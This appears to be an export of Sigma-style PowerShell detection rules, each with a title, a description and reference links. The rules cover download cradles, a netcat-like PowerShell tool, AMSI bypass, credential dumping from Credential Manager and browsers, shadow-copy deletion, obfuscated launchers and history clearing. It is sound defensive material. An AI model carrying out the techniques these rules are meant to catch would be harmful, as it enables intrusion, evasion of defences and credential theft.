https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/, https://securelist.com/faq-the-projectsauron-apt/75533/, https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, https://www.us-cert.gov/ncas/alerts/TA17-117A, https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html, https://thedfirreport.com/2020/06/21/snatch-ransomware/, https://github.com/RiccardoAncarani/LiquidSnake, https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity, https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a, https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf, https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/, https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ |
Nslookup PowerShell Download Cradle |
Detects a powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records. |
https://twitter.com/Alh4zr3d/status/1566489367232651264 |
PsExec Tool Execution From Suspicious Locations - PipeName |
Detects PsExec default pipe creation where the executed image is located in a suspicious location, which could indicate that the tool is being used in an attack |
https://www.jpcert.or.jp/english/pub/sr/ir_research.html, https://jpcertcc.github.io/ToolAnalysisResultSheet |
Delete Volume Shadow Copies Via WMI With PowerShell |
Detects Shadow Copies deletion using operating system utilities via PowerShell |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md, https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods |
PowerShell Downgrade Attack - PowerShell |
Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0 |
http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/ |
PowerShell Called from an Executable Version Mismatch |
Detects PowerShell called from an executable by the version mismatch method |
https://adsecurity.org/?p=2921 |
Netcat The Powershell Version |
Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network |
https://nmap.org/ncat/, https://github.com/besimorhino/powercat, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md |
Potential RemoteFXvGPUDisablement.EXE Abuse |
Detects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1 |
Remote PowerShell Session (PS Classic) |
Detects remote PowerShell sessions |
https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html |
Renamed Powershell Under Powershell Channel |
Detects a renamed Powershell execution, which is a common technique used to circumvent security controls and bypass detection logic that's dependent on process names and process paths.
|
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse |
Suspicious PowerShell Download |
Detects suspicious PowerShell download command |
https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html |
Use Get-NetTCPConnection |
Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell |
Zip A Folder With PowerShell For Staging In Temp - PowerShell |
Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration.
An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a |
Tamper Windows Defender - PSClassic |
Detects attempts to disable scheduled scanning and other parts of Windows Defender ATP or to set default actions to allow. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md |
Suspicious Non PowerShell WSMAN COM Provider |
Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application. |
https://twitter.com/chadtilbury/status/1275851297770610688, https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/, https://github.com/bohops/WSMan-WinRM |
Potential Active Directory Enumeration Using AD Module - PsModule |
Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL, which is often used by attackers to perform AD enumeration. |
https://github.com/samratashok/ADModule, https://twitter.com/cyb3rops/status/1617108657166061568?s=20, https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges |
Alternate PowerShell Hosts - PowerShell Module |
Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe |
https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html |
Bad Opsec Powershell Code Artifacts |
Focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including
Cobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads
that often undergo minimal changes by attackers due to bad opsec.
|
https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/, https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/, https://www.mdeditor.tw/pl/pgRt |
Clear PowerShell History - PowerShell Module |
Detects keywords that could indicate clearing PowerShell history |
https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a |
PowerShell Decompress Commands |
A general detection for specific decompress commands in PowerShell logs. This could be an adversary decompressing files. |
https://github.com/OTRF/detection-hackathon-apt29/issues/8, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.A.3_09F29912-8E93-461E-9E89-3F06F6763383.md |
Malicious PowerShell Scripts - PoshModule |
Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance |
https://github.com/PowerShellMafia/PowerSploit, https://github.com/NetSPI/PowerUpSQL, https://github.com/CsEnox/EventViewer-UACBypass, https://web.archive.org/web/20210511204621/https://github.com/AlsidOfficial/WSUSpendu, https://github.com/nettitude/Invoke-PowerThIEf, https://github.com/S3cur3Th1sSh1t/WinPwn, https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries, https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1, https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1, https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1, https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1, https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/, https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/, https://github.com/HarmJ0y/DAMP, https://github.com/samratashok/nishang, https://github.com/DarkCoderSc/PowerRunAsSystem/, https://github.com/besimorhino/powercat |
Suspicious Get-ADDBAccount Usage |
Detects suspicious invocation of the Get-ADDBAccount script, which reads from an ntds.dit file and may be used to get access to credentials without using any credential dumpers |
https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/, https://github.com/MichaelGrafnetter/DSInternals/blob/7ba59c12ee9a1cb430d7dc186a3366842dd612c8/Documentation/PowerShell/Get-ADDBAccount.md |
PowerShell Get Clipboard |
A general detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents. |
https://github.com/OTRF/detection-hackathon-apt29/issues/16, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.md |
HackTool - Evil-WinRm Execution - PowerShell Module |
Detects the execution of Evil-WinRM via PowerShell Module logs by leveraging the hardcoded strings inside the utility.
|
https://github.com/Hackplayers/evil-winrm/blob/7514b055d67ec19836e95c05bd63e7cc47c4c2aa/evil-winrm.rb, https://github.com/search?q=repo%3AHackplayers%2Fevil-winrm++shell.run%28&type=code |
Invoke-Obfuscation CLIP+ Launcher - PowerShell Module |
Detects Obfuscated use of Clip.exe to execute PowerShell |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module |
Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below |
https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888 |
Invoke-Obfuscation STDIN+ Launcher - PowerShell Module |
Detects Obfuscated use of stdin to execute PowerShell |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation VAR+ Launcher - PowerShell Module |
Detects Obfuscated use of Environment Variables to execute PowerShell |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module |
Detects Obfuscated Powershell via COMPRESS OBFUSCATION |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module |
Detects Obfuscated Powershell via RUNDLL LAUNCHER |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Stdin - PowerShell Module |
Detects Obfuscated Powershell via Stdin in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Use MSHTA - PowerShell Module |
Detects Obfuscated Powershell via use MSHTA in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Use Clip - PowerShell Module |
Detects Obfuscated Powershell via use Clip.exe in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Use Rundll32 - PowerShell Module |
Detects Obfuscated Powershell via use Rundll32 in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module |
Detects Obfuscated Powershell via VAR++ LAUNCHER |
https://github.com/SigmaHQ/sigma/issues/1009 |
Malicious PowerShell Commandlets - PoshModule |
Detects Commandlet names from well-known PowerShell exploitation frameworks |
https://adsecurity.org/?p=2921, https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries, https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1, https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1, https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1, https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1, https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/, https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/, https://github.com/calebstewart/CVE-2021-1675, https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1, https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html, https://github.com/HarmJ0y/DAMP, https://github.com/samratashok/nishang, https://github.com/DarkCoderSc/PowerRunAsSystem/, https://github.com/besimorhino/powercat, https://github.com/Kevin-Robertson/Powermad, https://github.com/adrecon/ADRecon, https://github.com/adrecon/AzureADRecon |
Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell Module |
Detects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1 |
AD Groups Or Users Enumeration Using PowerShell - PoshModule |
Adversaries may attempt to find domain-level groups and permission settings.
The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.
Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md |
Remote PowerShell Session (PS Module) |
Detects remote PowerShell sessions |
https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html |
Suspicious PowerShell Download - PoshModule |
Detects suspicious PowerShell download command |
https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadfile?view=net-8.0, https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadstring?view=net-8.0 |
Use Get-NetTCPConnection - PowerShell Module |
Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell |
Suspicious PowerShell Invocations - Generic - PowerShell Module |
Detects suspicious PowerShell invocation command parameters |
Internal Research |
Suspicious PowerShell Invocations - Specific - PowerShell Module |
Detects suspicious PowerShell invocation command parameters |
Internal Research |
Suspicious Get Local Groups Information |
Adversaries may attempt to find local system groups and permission settings.
The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.
Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md |
Suspicious Computer Machine Password by PowerShell |
The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain.
You can use it to reset the password of the local computer.
|
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/reset-computermachinepassword?view=powershell-5.1, https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ |
Suspicious Get Information for SMB Share - PowerShell Module |
Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and
to identify potential systems of interest for Lateral Movement.
Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md |
Zip A Folder With PowerShell For Staging In Temp - PowerShell Module |
Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration.
An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a |
SyncAppvPublishingServer Bypass Powershell Restriction - PS Module |
Detects SyncAppvPublishingServer process execution, which is usually utilized by adversaries to bypass PowerShell execution restrictions. |
https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ |
AADInternals PowerShell Cmdlets Execution - PsScript |
Detects AADInternals cmdlet execution. AADInternals is a tool for administering Azure AD and Office 365 which can be abused by threat actors to attack Azure AD or Office 365. |
https://o365blog.com/aadinternals/, https://github.com/Gerenios/AADInternals |
Access to Browser Login Data |
Adversaries may acquire credentials from web browsers by reading files specific to the target browser.
Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.
Web browsers typically store the credentials in an encrypted format within a credential store.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md |
Potential Active Directory Enumeration Using AD Module - PsScript |
Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL, which is often used by attackers to perform AD enumeration. |
https://github.com/samratashok/ADModule, https://twitter.com/cyb3rops/status/1617108657166061568?s=20, https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges |
Add Windows Capability Via PowerShell Script |
Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others. |
https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell, https://www.virustotal.com/gui/file/af1c82237b6e5a3a7cdbad82cc498d298c67845d92971bada450023d1335e267/content |
Powershell Add Name Resolution Policy Table Rule |
Detects PowerShell scripts that add a Name Resolution Policy Table (NRPT) rule for the specified namespace.
This bypasses the default DNS server and uses the specified server for answering the query.
|
https://twitter.com/NathanMcNulty/status/1569497348841287681, https://learn.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps |
PowerShell ADRecon Execution |
Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7 |
https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1, https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319 |
AMSI Bypass Pattern Assembly GetType |
Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts |
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/, https://twitter.com/cyb3rops/status/1588574518057979905?s=20&t=A7hh93ONM7ni1Rj1jO5OaA |
Potential AMSI Bypass Script Using NULL Bits |
Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities |
https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-bypass-using-null-bits-satoshi |
Silence.EDA Detection |
Detects Silence EmpireDNSAgent as described in the Group-IB report |
https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf |
Get-ADUser Enumeration Using UserAccountControl Flags |
Detects AS-REP roasting, an attack that is often overlooked. It is not very common, as you have to explicitly set accounts that do not require pre-authentication. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md#atomic-test-11---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting, https://shellgeek.com/useraccountcontrol-flags-to-manipulate-properties/ |
Potential Data Exfiltration Via Audio File |
Detects potential exfiltration attempt via audio file using PowerShell |
https://github.com/gtworek/PSBits/blob/e97cbbb173b31cbc4d37244d3412de0a114dacfb/NoDLP/bin2wav.ps1 |
Automated Collection Command PowerShell |
Once established within a system or network, an adversary may use automated techniques for collecting internal data. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md |
Windows Screen Capture with CopyFromScreen |
Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.
Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-6---windows-screen-capture-copyfromscreen |
Clearing Windows Console History |
Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. |
https://stefanos.cloud/blog/kb/how-to-clear-the-powershell-command-history/, https://www.shellhacks.com/clear-history-powershell/, https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics |
Clear PowerShell History - PowerShell |
Detects keywords that could indicate clearing PowerShell history |
https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a |
Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell |
Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file |
http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html, https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/, https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf |
Powershell Create Scheduled Task |
Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-4---powershell-cmdlet-scheduled-task, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-6---wmi-invoke-cimmethod-scheduled-task |
Powershell Install a DLL in System Directory |
Detects the use of PowerShell to install/copy a file into a system directory such as "System32" or "SysWOW64" |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1556.002/T1556.002.md#atomic-test-1---install-and-register-password-filter-dll |
Registry-Free Process Scope COR_PROFILER |
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR.
The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR).
These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.
(Citation: Microsoft Profiling Mar 2017)
(Citation: Microsoft COR_PROFILER Feb 2013)
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.012/T1574.012.md#atomic-test-3---registry-free-process-scope-cor_profiler |
PowerShell Create Local User |
Detects creation of a local user via PowerShell |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md |
Create Volume Shadow Copy with Powershell |
Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information |
https://attack.mitre.org/datasources/DS0005/, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7 |
Powershell Detect Virtualization Environment |
Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.
This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md, https://techgenix.com/malicious-powershell-scripts-evade-detection/ |
DirectorySearcher Powershell Exploitation |
Detects enumeration of Active Directory to determine which computers are joined to the domain |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-15---enumerate-domain-computers-within-active-directory-using-directorysearcher |
Manipulation of User Computer or Group Security Principals Across AD |
Adversaries may create a domain account to maintain access to victim systems.
Domain accounts are those managed by Active Directory Domain Services, where access and permissions are configured across systems and services that are part of that domain.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.002/T1136.002.md#atomic-test-3---create-a-new-domain-account-using-powershell, https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=net-8.0 |
Disable Powershell Command History |
Detects scripts or commands that disable the PowerShell command history by removing the PSReadline module |
https://twitter.com/DissectMalware/status/1062879286749773824 |
Disable-WindowsOptionalFeature Command PowerShell |
Detects the built-in PowerShell cmdlet Disable-WindowsOptionalFeature, a Deployment Image Servicing and Management tool.
Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images.
|
https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md, https://learn.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps |
Potential In-Memory Execution Using Reflection.Assembly |
Detects usage of "Reflection.Assembly" load functions to dynamically load assemblies in memory |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=50 |
Potential COM Objects Download Cradles Usage - PS Script |
Detects usage of COM objects that can be abused to download files in PowerShell by CLSID |
https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0, https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57 |
DSInternals Suspicious PowerShell Cmdlets - ScriptBlock |
Detects execution and usage of the DSInternals PowerShell module, which can be used to perform what might be considered suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files.
The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.
|
https://github.com/MichaelGrafnetter/DSInternals/blob/39ee8a69bbdc1cfd12c9afdd7513b4788c4895d4/Src/DSInternals.PowerShell/DSInternals.psd1 |
Dump Credentials from Windows Credential Manager With PowerShell |
Adversaries may search for common password storage locations to obtain user credentials.
Passwords are stored in several places on a system, depending on the operating system or application holding the credentials.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md |
Enable Windows Remote Management |
Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2 |
Potential Suspicious Windows Feature Enabled |
Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool.
Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images.
|
https://learn.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps, https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system, https://learn.microsoft.com/en-us/windows/wsl/install-on-server |
Enumerate Credentials from Windows Credential Manager With PowerShell |
Adversaries may search for common password storage locations to obtain user credentials.
Passwords are stored in several places on a system, depending on the operating system or application holding the credentials.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md |
Disable of ETW Trace - Powershell |
Detects usage of powershell cmdlets to disable or remove ETW trace sessions |
https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63 |
Suspicious PowerShell Mailbox SMTP Forward Rule |
Detects usage of the PowerShell Set-Mailbox cmdlet to set up an SMTP forwarding rule. |
https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/ |
Certificate Exported Via PowerShell - ScriptBlock |
Detects calls to cmdlets inside of PowerShell scripts that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines. |
https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a, https://learn.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate?view=windowsserver2022-ps, https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html |
Suspicious FromBase64String Usage On Gzip Archive - Ps Script |
Detects attempts to decode a base64 Gzip archive in a PowerShell script. This technique is often used as a method to load malicious content into memory afterward. |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43 |
Service Registry Permissions Weakness Check |
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.
Adversaries may use flaws in Registry permissions to redirect from the originally specified executable to one that they control, in order to launch their own code at service start.
Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.4 |
Active Directory Computers Enumeration With Get-AdComputer |
Detects usage of the "Get-AdComputer" cmdlet to enumerate computers or their properties within Active Directory. |
https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-adcomputer, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md, https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1087.002/T1087.002.md |
